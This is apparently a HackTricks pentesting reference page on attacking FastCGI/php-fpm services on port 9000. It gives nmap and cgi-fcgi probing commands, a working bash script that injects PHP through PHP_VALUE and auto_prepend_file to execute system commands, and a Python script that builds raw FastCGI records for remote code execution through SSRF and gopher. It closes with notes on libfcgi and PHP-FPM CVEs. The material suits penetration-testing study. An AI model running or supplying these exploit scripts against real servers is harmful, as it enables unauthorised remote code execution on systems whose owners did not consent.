9000 Pentesting FastCGI

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

If you want to learn what is FastCGI check the following page:

disable_functions bypass - php-fpm/FastCGI

By default FastCGI run in port 9000 and isn’t recognized by nmap. Usually FastCGI only listen in localhost.

Enumeration / Quick checks

  • Port scan: nmap -sV -p9000 <target> (will often show “unknown” service; manually test).
  • Probe FPM status page: SCRIPT_FILENAME=/status SCRIPT_NAME=/status REQUEST_METHOD=GET cgi-fcgi -bind -connect 127.0.0.1:9000 (default php-fpm pm.status_path).
  • Find reachable sockets via SSRF: if an HTTP service is exploitable for SSRF, try gopher://127.0.0.1:9000/_... payloads to hit the FastCGI listener.
  • Nginx misconfigs: cgi.fix_pathinfo=1 with fastcgi_split_path_info errors let you append /.php to static files and reach PHP (code exec via traversal).

RCE

It’s quite easy to make FastCGI execute arbitrary code:

Send FastCGI request that prepends PHP payload 
#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" 
FILENAMES="/var/www/public/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done

or you can also use the following python script: https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75

SSRF/gopher to FastCGI (when 9000 is not directly reachable)

If you only control an SSRF primitive, you can still hit FastCGI using the gopher scheme and craft a full FastCGI request. Example payload builder:

Build and send a gopher FastCGI RCE payload 
import struct, socket
host, port = "127.0.0.1", 9000
params = {
    b"REQUEST_METHOD": b"POST",
    b"SCRIPT_FILENAME": b"/var/www/html/index.php",
    b"PHP_VALUE": b"auto_prepend_file=php://input\nallow_url_include=1"
}
body = b"<?php system('id'); ?>"

def rec(rec_type, content, req_id=1):
    return struct.pack("!BBHHBB", 1, rec_type, req_id, len(content), 0, 0) + content

def enc_params(d):
    out = b""
    for k, v in d.items():
        out += struct.pack("!B", len(k)) + struct.pack("!B", len(v)) + k + v
    return out
payload  = rec(4, enc_params(params)) + rec(4, b"")  # FCGI_PARAMS + terminator
payload += rec(5, body)                                # FCGI_STDIN

s = socket.create_connection((host, port))
s.sendall(payload)
print(s.recv(4096))

Convert payload to URL-safe base64/percent-encoding and send via gopher://host:9000/_<payload> in your SSRF.

Notes on recent issues

  • libfcgi <= 2.4.4 integer overflow (2024): crafted nameLen/valueLen in FastCGI records can overflow on 32‑bit builds (common in embedded/IoT), yielding heap RCE when the FastCGI socket is reachable (directly or via SSRF).
  • PHP-FPM log manipulation (CVE-2024-9026): when catch_workers_output = yes, attackers who can send FastCGI requests may truncate or inject up to 4 bytes per log line to erase indicators or poison logs.
  • Classic Nginx + cgi.fix_pathinfo misconfig: still widely seen; if fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; is used without file existence checks, any path ending in .php gets executed, enabling path traversal or source overwrite style gadgets.

References

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks